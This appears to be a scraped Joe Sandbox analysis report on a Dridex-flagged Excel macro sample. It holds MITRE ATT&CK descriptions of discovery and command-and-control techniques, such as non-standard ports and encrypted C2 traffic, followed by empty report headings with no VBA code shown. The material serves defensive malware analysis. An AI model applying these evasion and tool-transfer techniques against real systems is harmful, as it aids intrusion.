Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report INV2680371456-20210111889374.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/338309/sample/INV2680371456-20210111889374.xlsm"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3215

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 1639

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General